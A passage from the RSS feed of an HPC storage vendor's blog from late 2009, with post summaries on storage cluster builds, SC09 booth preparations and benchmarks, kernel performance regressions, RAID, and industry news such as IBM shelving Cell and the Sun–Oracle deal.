      <description>The day job has a registration page for people who are interested in purchasing high performance storage, deskside supercomputing, storage clusters, and other HPC like things from us. This registration page asks some very simple things: who are you, where are you, what your shipping/billing address is, what you want your user name to be, and what things you want information on. Registration is, fundamentally, a matter of trust. We guarantee we will not spam people.</description>
    </item>
    
    <item>
      <title>Storage cluster drag racing ...</title>
      <link>https://blog.scalability.org/2009/12/storage-cluster-drag-racing/</link>
      <pubDate>Tue, 01 Dec 2009 23:54:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/12/storage-cluster-drag-racing/</guid>
      <description>&amp;hellip; well, I am trying to figure out what I am doing wrong in io-bm. I need a new method to defeat some of the smarter caching bits, my MPI_Send/MPI_Recv pairs are blocking pairs, and this impacted performance. Not only that, the additional traffic over the InfiniBand was definitely a cause of contention on the wire. Doing some TB-sized writes at a good rate. The &amp;ldquo;naive&amp;rdquo; bandwidths (the way IOzone calculates them) are about where we predicted given the measured IB performance.</description>
    </item>
    
    <item>
      <title>OT: ethics and transparency in scientific communications</title>
      <link>https://blog.scalability.org/2009/11/ot-ethics-and-transparency-in-scientific-communications/</link>
      <pubDate>Sun, 29 Nov 2009 03:36:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/ot-ethics-and-transparency-in-scientific-communications/</guid>
      <description>This is more of an itch I need to scratch. I am a recovering/reformed computational physicist. I really enjoyed doing work in modeling semiconductors, and I had hoped to post-doc modeling the dynamics of proteins among other things. Of course, my academic career ran head first into the deluge of physicists from the former Soviet Union, all with 20+ year seniority, all willing to work for less money. A generation of young physicists was lost to this onslaught; I decided to do something else after finishing up.</description>
    </item>
    
    <item>
      <title>Nice to know I&#39;ve had an impact on language ...</title>
      <link>https://blog.scalability.org/2009/11/nice-to-know-ive-had-an-impact-on-language/</link>
      <pubDate>Sat, 28 Nov 2009 21:29:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/nice-to-know-ive-had-an-impact-on-language/</guid>
      <description>From this article linked from /., I found this tidbit
Heh. I wonder if anyone else used that term, for accelerators, before they did. I wonder. APUs are taking HPC by storm. This is creative destruction you are witnessing. We moved mostly out of the market being destroyed over the last year or so, and focused upon the market being created. It absolutely blows me over that Vipin&amp;rsquo;s and my strategy pitch is being played, almost to the letter, by the successful players in this market.</description>
    </item>
    
    <item>
      <title>IBM shelves Cell</title>
      <link>https://blog.scalability.org/2009/11/ibm-shelves-cell/</link>
      <pubDate>Fri, 27 Nov 2009 05:37:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/ibm-shelves-cell/</guid>
      <description>It looks like IBM is going to shelve the Power Cell processor. Cell, during its lifetime, never really garnered the ubiquity it needed to do what NVidia is doing with GPU. I had guessed on this site previously that Cell needed to get wider distribution to maintain a base. The business model for acceleration is ubiquity, and then it&amp;rsquo;s a tools play. Unfortunately IBM never really seemed to commit to the platform.</description>
    </item>
    
    <item>
      <title>I keep forgetting how brittle anaconda is ...</title>
      <link>https://blog.scalability.org/2009/11/i-keep-forgetting-how-brittle-anaconda-is/</link>
      <pubDate>Thu, 26 Nov 2009 09:17:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/i-keep-forgetting-how-brittle-anaconda-is/</guid>
      <description>&amp;hellip; until I need to use it. Anaconda is the Redhat/Fedora installer. It purports to be a reasonable installation tool. But it has a number of interesting issues. Some of these issues make installs &amp;hellip; well &amp;hellip; exciting. I&amp;rsquo;ve taken to the philosophy of absolute minimum time spent in anaconda. Call this defensive installation. Anaconda will toss fatal errors, with no hope of recovery &amp;hellip; unless you want to try and debug some obscure python &amp;hellip; Back in the SGI days, I wrote an installer that largely worked around the SGI installer.</description>
    </item>
    
    <item>
      <title>Designing the next generation of our storage systems</title>
      <link>https://blog.scalability.org/2009/11/designing-the-next-generation-of-our-storage-systems/</link>
      <pubDate>Sun, 22 Nov 2009 06:25:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/designing-the-next-generation-of-our-storage-systems/</guid>
      <description>Back from SC09, and for a project Vipin asked me to work on quickly, I am cranking out our roadmaps in greater detail. One of the things I&amp;rsquo;ve been thinking of for a long time is, what comes after JackRabbit and DeltaV? In the case of JackRabbit, even when it is hobbled by a poorly performing IB network (we are still working on why this is the case), we appear to kick some serious tail in the high performance cluster storage space &amp;hellip; our worst case result was 4x faster than a competitor&amp;rsquo;s best case on the same problem (info was presented at SC09 in a public talk by the user, so I think it&amp;rsquo;s ok to talk about; if not, let me know and I&amp;rsquo;ll elide this).</description>
    </item>
    
    <item>
      <title>One of the best (funniest) quotes from #SC09</title>
      <link>https://blog.scalability.org/2009/11/one-of-the-best-funniest-quotes-from-sc09/</link>
      <pubDate>Sat, 21 Nov 2009 15:26:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/one-of-the-best-funniest-quotes-from-sc09/</guid>
      <description>From HPCwire &amp;hellip;
Like &amp;hellip; totally &amp;hellip; Ok &amp;hellip; apart from the humor in the quote (and I am hoping that Allan or the writer meant that comment to be interpreted in a semi-humorous manner &amp;hellip; it&amp;rsquo;s also very possible Allan didn&amp;rsquo;t say that and the writer took &amp;hellip; er &amp;hellip; liberties &amp;hellip; yeah, that&amp;rsquo;s it &amp;hellip; and decided to embark on a more, how shall I say this &amp;hellip; creative writing effort than more serious journalism &amp;hellip; embellish it a bit), there is another thread that is worth discussing.</description>
    </item>
    
    <item>
      <title>#sc09 [T&#43;2] user benchmarks of the MSI storage cluster</title>
      <link>https://blog.scalability.org/2009/11/sc09-t2-user-benchmarks-of-the-msi-storage-cluster/</link>
      <pubDate>Thu, 19 Nov 2009 07:07:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/sc09-t2-user-benchmarks-of-the-msi-storage-cluster/</guid>
      <description>Minnesota Supercomputing Institute purchased the first siCluster (PR on disk, finishing up and getting out tomorrow), which is a scalable storage cluster product, aimed at providing very scalable performance and capacity. I was worried after the talk I gave at their booth. Their researcher indicated our performance wasn&amp;rsquo;t good. We had turned off some caching to avoid problems during the acceptance test for HP, the Itasca cluster vendor. The Itasca cluster is quite nice.</description>
    </item>
    
    <item>
      <title>#sc09 [T&#43;2]  its like drinking from a fire hose ...</title>
      <link>https://blog.scalability.org/2009/11/sc09-t2-its-like-drinking-from-a-fire-hose/</link>
      <pubDate>Thu, 19 Nov 2009 06:59:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/sc09-t2-its-like-drinking-from-a-fire-hose/</guid>
      <description>Ok &amp;hellip; so so many things going on. All at once. I&amp;rsquo;ve done what &amp;hellip; like 3 on camera interviews over the last 48 hours, and have another one coming up. I&amp;rsquo;ve given a talk, and attended a talk. More on that in the next post. Ok. Vipin needs me to work on something tonight, so I might not get nearly as much sleep as I want. Gotta hit the gym tomorrow too.</description>
    </item>
    
    <item>
      <title>Sabalcore Computing Has Selected Scalable Informatics as Their Primary Storage Vendor</title>
      <link>https://blog.scalability.org/2009/11/sabalcore-computing-has-selected-scalable-informatics-as-their-primary-storage-vendor/</link>
      <pubDate>Tue, 17 Nov 2009 09:02:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/sabalcore-computing-has-selected-scalable-informatics-as-their-primary-storage-vendor/</guid>
      <description>See the press release. Sabalcore (fka Tsunamic Technologies) is a cluster-on-demand vendor, providing high performance computing without the hassle of buying/maintaining your own.</description>
    </item>
    
    <item>
      <title>#sc09 [T-0]  NFS over 10GbE at 1 GB/s</title>
      <link>https://blog.scalability.org/2009/11/sc09-t-0-nfs-over-10gbe-at-1-gbs/</link>
      <pubDate>Tue, 17 Nov 2009 02:10:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/sc09-t-0-nfs-over-10gbe-at-1-gbs/</guid>
      <description>Just thought we&amp;rsquo;d run some nice little performance tests using io-bm (yeah, I know, I have to release it already). Remember, this is booth 635 if you want us to do this live &amp;hellip; Here is a write, from the Pegasus, to the JR4. Over a single 10GbE link.
scalable@pegasus:~$ /opt/openmpi133/bin/mpirun -v -np 4 `pwd`/io-bm.exe -n 32 -w -f /data/jr4/nfs/io-bm-test ... Thread=3: time = 32.682s IO bandwidth = 250.655 MB/s Thread=0: time = 32.</description>
    </item>
    
    <item>
      <title>#sc09 [T-0]: The demo ...</title>
      <link>https://blog.scalability.org/2009/11/sc09-t-0-the-demo/</link>
      <pubDate>Mon, 16 Nov 2009 20:18:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/sc09-t-0-the-demo/</guid>
      <description>So we worked hard with our partners to get a demo going. One that highlighted their software, and our hardware. And we got this going with their kind and patient help. One problem. It goes so fast &amp;hellip; its done in about a second &amp;hellip; :)</description>
    </item>
    
    <item>
      <title>#sc09 : my talk at Minnesota Supercomputing Institute&#39;s booth on Tuesday 3-3:30pm</title>
      <link>https://blog.scalability.org/2009/11/sc09-my-talk-at-minnesota-supercomputer-insitutes-booth-on-tuesday-3-330pm/</link>
      <pubDate>Mon, 16 Nov 2009 06:24:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/sc09-my-talk-at-minnesota-supercomputer-insitutes-booth-on-tuesday-3-330pm/</guid>
      <description>Please do come by, I may have shirts for people attending the talk if they ask good questions at the end (no, &amp;ldquo;what is your name&amp;rdquo; or &amp;ldquo;what is the airspeed of an unladen swallow&amp;rdquo; doesn&amp;rsquo;t count). We will be talking about the first installed siCluster storage cluster system, designed to enable scalable performance and capacity. We&amp;rsquo;ll cover goals, design considerations, implementation issues. And some benchmarks, though we are going to have an interesting caveat in them.</description>
    </item>
    
    <item>
      <title>SC09 [T-1 day]:  The booth is (mostly) up</title>
      <link>https://blog.scalability.org/2009/11/sc09-t-1-day-the-booth-is-mostly-up/</link>
      <pubDate>Mon, 16 Nov 2009 06:11:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/sc09-t-1-day-the-booth-is-mostly-up/</guid>
      <description>A JackRabbit JR4, and a Pegasus deskside supercomputer are there (booth 635 on the show floor, Intel Partner Pavilion). We ran into a cooling issue though, so I had to pull one of the GPU cards. Working on a few other things to fix. Might have a corrupted zip file for the demo (ugh). Will try to fix now. We are in booth 635 with several other partners of Intel. Come by and say hi!</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-11-16</title>
      <link>https://blog.scalability.org/2009/11/twitter-updates-for-2009-11-16/</link>
      <pubDate>Mon, 16 Nov 2009 06:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/twitter-updates-for-2009-11-16/</guid>
      <description>* On #[sc09](http://search.twitter.com/search?q=%23sc09) show floor booth 635 setting up the Pegasus box. Will ha a nice #[hpc](http://search.twitter.com/search?q=%23hpc) #[storage](http://search.twitter.com/search?q=%23storage) and processing machine [#](http://twitter.com/sijoe/statuses/5744988683)  Powered by Twitter Tools</description>
    </item>
    
    <item>
      <title>SC09 [T -3 days] shipped everything to the booth by UPS</title>
      <link>https://blog.scalability.org/2009/11/sc09-t-3-days-shipped-everything-to-the-booth-by-ups/</link>
      <pubDate>Fri, 13 Nov 2009 12:11:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/sc09-t-3-days-shipped-everything-to-the-booth-by-ups/</guid>
      <description>Hopefully it will get there. Had to disassemble the CPU coolers in the Pegasus, and remove the disks from the JackRabbit. Pegasus has a pair of rocking Nehalem W5590 chips, 32 hard disks, 48 GB RAM, a Tesla, a GTX260, and a pair of 10GbE ports. The JackRabbit was doing 1.8 GB/s reads and 1.3 GB/s writes in tests right before we shipped. It also has a pair of 10GbE ports, 72 GB RAM, and a pair of W5580 Nehalems.</description>
    </item>
    
    <item>
      <title>OT: comparing Droid to iPhone</title>
      <link>https://blog.scalability.org/2009/11/ot-comparing-droid-to-iphone/</link>
      <pubDate>Fri, 13 Nov 2009 12:06:49 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/ot-comparing-droid-to-iphone/</guid>
      <description>My Blackberry is dying. And Verizon seems to like to disable useful things, like GPS, Wifi, and all manner of other things. So these nice fancy phones &amp;hellip; its hard to make full use of them. I am looking at two options for replacement: iphone and droid. The latter is in a Motorola device, brand new, from Verizon. Verizon is at least getting the clue that disabling features is not a wise move in a competitive environment.</description>
    </item>
    
    <item>
      <title>Twitter Updates for 2009-11-12</title>
      <link>https://blog.scalability.org/2009/11/twitter-updates-for-2009-11-12/</link>
      <pubDate>Thu, 12 Nov 2009 06:05:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/twitter-updates-for-2009-11-12/</guid>
      <description>* Does anyone actually delete their pr0n followers? Or do you let them accumulate? Just curious. [#](http://twitter.com/sijoe/statuses/5641846105) * Machines for #[sc09](http://search.twitter.com/search?q=%23sc09) have been built. With any luck, we&#39;ll ship them tomorrow. Then I&#39;ll set it up at the booth. May buy a monitor there ... [#](http://twitter.com/sijoe/statuses/5641868843) * working on #[hpc](http://search.twitter.com/search?q=%23hpc) #[storage](http://search.twitter.com/search?q=%23storage) #[cluster](http://search.twitter.com/search?q=%23cluster) specs document for #[sc09](http://search.twitter.com/search?q=%23sc09) announcement [#](http://twitter.com/sijoe/statuses/5641897733)  Powered by Twitter Tools</description>
    </item>
    
    <item>
      <title>This doesn&#39;t look like its going to end any other way but badly</title>
      <link>https://blog.scalability.org/2009/11/this-doesnt-look-like-its-going-to-end-any-other-way-but-badly/</link>
      <pubDate>Wed, 11 Nov 2009 04:37:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/this-doesnt-look-like-its-going-to-end-any-other-way-but-badly/</guid>
      <description>News from the EU regulators. They are objecting to the hookup between Sun and Oracle. Whether or not their objections have merit &amp;hellip; their focus appears to be a loss of competition to Oracle from the &amp;ldquo;loss&amp;rdquo; of an independent MySQL &amp;hellip; this is not good for Sun. There are 2 possible outcomes from the EU at the end of the process. They will either accept the acquisition, or disallow it.</description>
    </item>
    
    <item>
      <title>SC09 talk bits</title>
      <link>https://blog.scalability.org/2009/11/sc09-talk-bits/</link>
      <pubDate>Tue, 10 Nov 2009 13:16:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/sc09-talk-bits/</guid>
      <description>I&amp;rsquo;ll be giving a talk at SC09 about the design and installation of our new siCluster (storage cluster) product. The talk is entitled &amp;ldquo;Feeding the hungry Gopher&amp;rdquo;. I&amp;rsquo;ll explain that in a moment. It is Tuesday, November 17th, 3-3:30pm, at the Minnesota Supercomputing Institute booth. The gopher is the mascot of the University of Minnesota. The hungry gopher(s) are, in this case, the 1000+ nodes of their new HP cluster named Itasca.</description>
    </item>
    
    <item>
      <title>SC09 booth bits</title>
      <link>https://blog.scalability.org/2009/11/sc09-booth-bits/</link>
      <pubDate>Tue, 10 Nov 2009 13:01:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/sc09-booth-bits/</guid>
      <description>Ok, here&amp;rsquo;s the scoop. We will be in the Intel Partner Pavilion booth #3077. We are going to be bringing a nice JackRabbit JR4 and a Pegasus-GPU unit. The JR4 will have a pair of nice fast Intel Nehalem CPUs in it (probably X5550&amp;rsquo;s), and the Pegasus will have a pair of W5580&amp;rsquo;s. Both units will have a bit of RAM, and the JR4 will have 24x 500 GB disks, while the Pegasus will have, get this, 32x 500 GB disks.</description>
    </item>
    
    <item>
      <title>The joy that is mmap ...</title>
      <link>https://blog.scalability.org/2009/11/the-joy-that-is-mmap/</link>
      <pubDate>Sat, 07 Nov 2009 18:59:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/the-joy-that-is-mmap/</guid>
      <description>Mmap is a way to provide file IO in a nice simple manner. Create a buffer area, and as you read/write into that buffer, this is reflected physically into the file. An oversimplification, but this is basically what it is. In most operating systems, mmap makes direct use of the paging paths in the kernel. Why am I writing about this? Because the paging paths are some of the slowest paths in modern kernels, typically doing IO a page at a time.</description>
    </item>
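The map-a-buffer, write-through-to-the-file behavior described in the summary above can be sketched in a few lines. A minimal Python illustration (the file name and sizes are arbitrary choices for the sketch, not from the post):

```python
import mmap
import os
import tempfile

# Create a scratch file of one page; mmap requires a non-empty file.
path = os.path.join(tempfile.mkdtemp(), "demo.bin")
with open(path, "wb") as f:
    f.write(b"\x00" * 4096)

# Map the file and write through the buffer; the kernel's paging
# machinery propagates the dirty pages back into the file.
with open(path, "r+b") as f:
    with mmap.mmap(f.fileno(), 0) as buf:
        buf[0:5] = b"hello"   # ordinary buffer write
        buf.flush()           # force writeback, analogous to msync(2)

# The bytes written via the mapping are now in the file itself.
with open(path, "rb") as f:
    print(f.read(5))          # b'hello'
```

Every dirty page here moves through the kernel's paging path, which is exactly the page-at-a-time cost the post is complaining about.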
    
    <item>
      <title>SC09 prep</title>
      <link>https://blog.scalability.org/2009/11/sc09-prep/</link>
      <pubDate>Mon, 02 Nov 2009 04:02:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/sc09-prep/</guid>
      <description>Next two weeks are going to be crazy. Prepping 2 machines for SC09, getting demos on there, testing them out (bits don&amp;rsquo;t die in transit &amp;hellip; oh no&amp;hellip; never happens :( ) Planning on a JR4 and a Pegasus. Likely a nice fast connection between the two. Pegasus will be interesting in that it will have many 2.5&amp;quot; disks, very fast Intel Nehalem chips, lots of RAM, and some nice fast GPU cards.</description>
    </item>
    
    <item>
      <title>Business brief</title>
      <link>https://blog.scalability.org/2009/11/business-brief/</link>
      <pubDate>Mon, 02 Nov 2009 03:50:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/11/business-brief/</guid>
      <description>If we simply stopped working today, after finishing up the orders in hand we need to deliver now, we would be reporting a 50% growth in revenue over last year. That is, if we worked for only 10 months out of 12 &amp;hellip; I won&amp;rsquo;t comment on our pipeline other than to say I like it. Did I mention I have been very busy?</description>
    </item>
    
    <item>
      <title>Weblog awards nominations open up on 2-Nov</title>
      <link>https://blog.scalability.org/2009/10/weblog-awards-nominations-open-up-on-2-nov/</link>
      <pubDate>Fri, 30 Oct 2009 13:41:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/10/weblog-awards-nominations-open-up-on-2-nov/</guid>
      <description>Folks, have a look at this. Please consider nominating and voting for your favorite tech/HPC blogs (no, not dropping any hints &amp;hellip; nosiree &amp;hellip; none whatsoever &amp;hellip; nothing to see here folks, move along &amp;hellip;).</description>
    </item>
    
    <item>
      <title>Would you take operational/marketing advice from someone without such experience?</title>
      <link>https://blog.scalability.org/2009/10/would-you-take-operationalmarketing-advice-from-someone-without-such-experience/</link>
      <pubDate>Fri, 30 Oct 2009 11:15:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/10/would-you-take-operationalmarketing-advice-from-someone-without-such-experience/</guid>
      <description>We are starting a process to get some additional capital into the company, apart from operations and profit generation. That is going well. One of the aspects of this is discussions with people over our strategy and other elements of the business. Some of these conversations are amusing. Some are annoying. Few are really helpful or insightful. That is, a great deal of time and effort is expended, with little return back for expending the time and effort.</description>
    </item>
    
    <item>
      <title>Reducing risk: avoiding the bricking phenomenon</title>
      <link>https://blog.scalability.org/2009/10/reducing-risk-avoiding-the-bricking-phenomenon/</link>
      <pubDate>Fri, 30 Oct 2009 10:52:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/10/reducing-risk-avoiding-the-bricking-phenomenon/</guid>
      <description>Something happened this week in a storage cluster we set up for a customer. You&amp;rsquo;ll hear more about the storage cluster at SC09, but thats not what this is about. This is about risk, and how to reduce it. Risk is a complex thing to define in practice, but there are several &amp;hellip; well &amp;hellip; simple ways you can indicate relative risk. A motherboard and power supply blew in one of our nodes.</description>
    </item>
    
    <item>
      <title>Updates:  storage cluster, SC09, and other things</title>
      <link>https://blog.scalability.org/2009/10/updates-storage-cluster-sc09-and-other-things/</link>
      <pubDate>Thu, 29 Oct 2009 01:40:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/10/updates-storage-cluster-sc09-and-other-things/</guid>
      <description>Been busy. Incredibly busy. Back with the storage cluster, fixing a blown KVM and, as I found this morning, a blown motherboard (and I am hoping that this is it, but we are preparing to replace all of the innards &amp;hellip; just in case). The storage cluster hit our performance targets in testing, even with IB running at 2/3 of rated speed. Working on finding out why 2/3 speed is the case vs full speed.</description>
    </item>
    
    <item>
      <title>Good performance numbers on the storage gluster</title>
      <link>https://blog.scalability.org/2009/10/good-performance-numbers-on-the-storage-gluster/</link>
      <pubDate>Fri, 23 Oct 2009 12:24:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/10/good-performance-numbers-on-the-storage-gluster/</guid>
      <description>I can&amp;rsquo;t go into them in depth, but we exceeded the performance targets (the system was purposefully designed to do this). The gluster team rocks! (I can&amp;rsquo;t emphasize this enough) Odd performance issue with the Mellanox QDR. Still trying to understand it, and hopefully will be able to update to our later kernel with the 1.5 OFED. I can say that running 24 parallel independent writes to each RAID w/o any parallel file system in there gave us about 20 GB/s of sustained bandwidth to disk in aggregate, for writes far larger than system cache.</description>
    </item>
    
    <item>
      <title>Cloud is over-hyped? No ... you don&#39;t say ...</title>
      <link>https://blog.scalability.org/2009/10/cloud-is-over-hyped-no-you-dont-say/</link>
      <pubDate>Sun, 18 Oct 2009 14:37:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/10/cloud-is-over-hyped-no-you-dont-say/</guid>
      <description>There are some real nuggets of value in &amp;ldquo;the cloud&amp;rdquo;&amp;trade; but as with &amp;ldquo;The Grid&amp;rdquo;&amp;trade; there is a serious land grab underway, where everything is &amp;hellip; er &amp;hellip; cloudy. Yeah, that&amp;rsquo;s a good phrase &amp;hellip; cloudy. Though nebulous fits as well. And of course, clouds being water vapor &amp;hellip; and often ice crystals &amp;hellip; I couldn&amp;rsquo;t resist, my apologies. More seriously, some analyst houses are noticing the massive over-hyping.
Now I am not a great fan of Gartner.</description>
    </item>
    
    <item>
      <title>IT storage ... why its not HPC storage, and shouldn&#39;t be used where you need HPC storage</title>
      <link>https://blog.scalability.org/2009/10/it-storage-why-its-not-hpc-storage-and-shouldnt-be-used-where-you-need-hpc-storage/</link>
      <pubDate>Sat, 17 Oct 2009 05:44:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/10/it-storage-why-its-not-hpc-storage-and-shouldnt-be-used-where-you-need-hpc-storage/</guid>
      <description>In a previous article, I railed on the concept of IT designing clusters. I pointed out many flaws we have seen when this happens. I&amp;rsquo;d like to do the same thing with storage. This will be brief. Recently had a customer for our consulting ask us, with deep incredulity, how one of our older 24 drive 7200 RPM SATA drive units could so thoroughly demolish (on benchmark testing) a brand new 24 drive 15kRPM SAS drive unit.</description>
    </item>
    
    <item>
      <title>Disruption in HPC (and storage)</title>
      <link>https://blog.scalability.org/2009/10/disruption-in-hpc-and-storage/</link>
      <pubDate>Sat, 17 Oct 2009 02:28:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/10/disruption-in-hpc-and-storage/</guid>
      <description>On InsideHPC, John West has an interesting story on disruption in HPC markets, and predictions on success or failure of a business. There are some interesting tidbits evident throughout the article.
This made me smile.
Our Delta-V encompasses these ideas. It&amp;rsquo;s designed to be a lower-end storage target. The tools we have developed around it (and are continuing to develop) to enable simplified management are meant to make dealing with large numbers of these devices very easy.</description>
    </item>
    
    <item>
      <title>The tipping point for APUs</title>
      <link>https://blog.scalability.org/2009/10/the-tipping-point-for-apus/</link>
      <pubDate>Sat, 17 Oct 2009 01:29:52 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/10/the-tipping-point-for-apus/</guid>
      <description>This news item on InsideHPC made me smile. In short, the HPC application vendors do see the value in decreasing the cost of hardware for their HPC users. It keeps more money available for end users to purchase licenses, even in the face of declining budgets. There are other problems, such as the software license cost now being substantially higher than the cost of the hardware to run the HPC codes on, but that is a separate issue.</description>
    </item>
    
    <item>
      <title>HPC Community Leadership Awards: Poll at InsideHPC</title>
      <link>https://blog.scalability.org/2009/10/hpc-community-leadership-awards-poll-at-insidehpc/</link>
      <pubDate>Fri, 16 Oct 2009 23:28:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/10/hpc-community-leadership-awards-poll-at-insidehpc/</guid>
      <description>If you haven&amp;rsquo;t seen this yet, have a look at what the InsideHPC team are up to. They are hosting a poll on who (people/groups) are providing the most impactful leadership in HPC. The post and poll are here. By all means, do go and express your opinion via the poll, and drop a comment to John and the crew on this award.</description>
    </item>
    
    <item>
      <title>Been busy ...</title>
      <link>https://blog.scalability.org/2009/10/been-busy/</link>
      <pubDate>Fri, 16 Oct 2009 02:51:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/10/been-busy/</guid>
      <description>We just shipped (at 5pm tonight) the storage cluster. I didn&amp;rsquo;t announce any performance data for it. I can say that this unit has 24 RAID adapters. And QDR IB &amp;hellip; 8 ports (going to 16 as soon as the extra cables arrive). It is using GlusterFS as the cluster file system. This project has kept us very busy over the last month. We have more in queue that we are working on.</description>
    </item>
    
    <item>
      <title>Update on performance regression</title>
      <link>https://blog.scalability.org/2009/10/update-on-performance-regression/</link>
      <pubDate>Fri, 16 Oct 2009 02:30:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/10/update-on-performance-regression/</guid>
      <description>A new, more stable RAID driver was used for our RAID card, and &amp;hellip; while it is indeed more stable, it has a significant performance regression when used with our updated kernel (actually, any kernel 2.6.23 and beyond). We should have a fix soon.</description>
    </item>
    
    <item>
      <title>Dealing with a severe performance regression</title>
      <link>https://blog.scalability.org/2009/10/dealing-with-a-severe-performance-regression/</link>
      <pubDate>Mon, 12 Oct 2009 17:10:15 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/10/dealing-with-a-severe-performance-regression/</guid>
      <description>Same hardware, booting into baseline kernel vs an updated version of our kernel. Normal testing on our part has our updated kernel at a significant performance advantage to the baseline. Imagine my surprise when, while trying to diagnose an issue on a machine we are building, we found baseline to be significantly faster. The only thing that has really changed between this and the older kernel is a newer driver for RAID.</description>
    </item>
    
    <item>
      <title>Was cash for clunkers a good thing after all?</title>
      <link>https://blog.scalability.org/2009/10/was-cash-for-clunkers-a-good-thing-after-all/</link>
      <pubDate>Mon, 05 Oct 2009 13:09:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/10/was-cash-for-clunkers-a-good-thing-after-all/</guid>
      <description>I had posited in the past that, apart from the odd design and old-vehicle destruction, yes, it was a good thing in terms of generating additional sales. I argued that it didn&amp;rsquo;t go on long enough. Germany has had one in force for months, and it seems to have done a great deal of good, though there was no requirement for destruction of the turned-in car; it could be scrapped, or broken down for parts, or &amp;hellip; Ok.</description>
    </item>
    
    <item>
      <title>times like this put a smile on my face ...</title>
      <link>https://blog.scalability.org/2009/09/times-like-this-put-a-smile-on-my-face/</link>
      <pubDate>Wed, 30 Sep 2009 01:37:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/times-like-this-put-a-smile-on-my-face/</guid>
      <description>We are running some burn-in tests on the JackRabbit storage cluster. 6 of 8 nodes are up, 2 need to be looked at tomorrow. On one of the nodes, we have 3 RAID cards. Because of how the customer wants the unit, it is better for us to have 3 separate file systems. So that&amp;rsquo;s what we have. They will all be aggregated shortly (hopefully tomorrow) with a nice cluster file system and some infiniband goodness.</description>
    </item>
    
    <item>
      <title>As the storage cluster builds ...</title>
      <link>https://blog.scalability.org/2009/09/as-the-storage-cluster-builds/</link>
      <pubDate>Mon, 28 Sep 2009 00:56:35 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/as-the-storage-cluster-builds/</guid>
      <description>Finally finished the Tiburon changes for the storage cluster config. Storage clusters are a bit different than computing clusters in a number of regards, not the least of those being the large RAID in the middle. In this case, the storage cluster is 8 identical JackRabbit JR5 units, each with 24 TB storage, 48 drives, 3 RAID cards, dual port QDR cards, and for our testing, we are using an SDR network (as we don&amp;rsquo;t have a nice 8 port QDR switch in house).</description>
    </item>
    
    <item>
      <title>Is RAID over?</title>
      <link>https://blog.scalability.org/2009/09/is-raid-over/</link>
      <pubDate>Fri, 25 Sep 2009 04:46:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/is-raid-over/</guid>
      <description>Henry Newman and a few other people I know are talking about RAID as being on the way out. John West pointed at this article this morning on InsideHPC. Their points are quite interesting. It boils down to this: If the time to rebuild a failed RAID is comparable to the mean time between uncorrectable errors (UCE), due to reading/writing volume, then RAID, as it is currently thought of, is going to need some serious rethinking.</description>
    </item>
    
    <item>
      <title>Been horrifically busy ... good busy ... but busy</title>
      <link>https://blog.scalability.org/2009/09/been-horrifically-busy-good-busy-but-busy/</link>
      <pubDate>Fri, 25 Sep 2009 02:15:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/been-horrifically-busy-good-busy-but-busy/</guid>
      <description>Will try to do updates soon, and I owe someone two articles (sorry!). Add to this fighting off a cold &amp;hellip; not a happy camper. Basically we are building an 8x JackRabbit JR5 storage cluster right now. I&amp;rsquo;ve caught a problem in Tiburon, our OS loader, in the process, and am fixing it. Tiburon is all about providing a very simple platform to enable PXE (and/or iSCSI) booting OSes to make installation/support simple.</description>
    </item>
    
    <item>
      <title>M&amp;A: Microsoft buys the *assets* of Interactive Supercomputing</title>
      <link>https://blog.scalability.org/2009/09/ma-microsoft-buys-the-assets-of-interactive-supercomputing/</link>
      <pubDate>Tue, 22 Sep 2009 23:43:36 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2009/09/ma-microsoft-buys-the-assets-of-interactive-supercomputing/</guid>
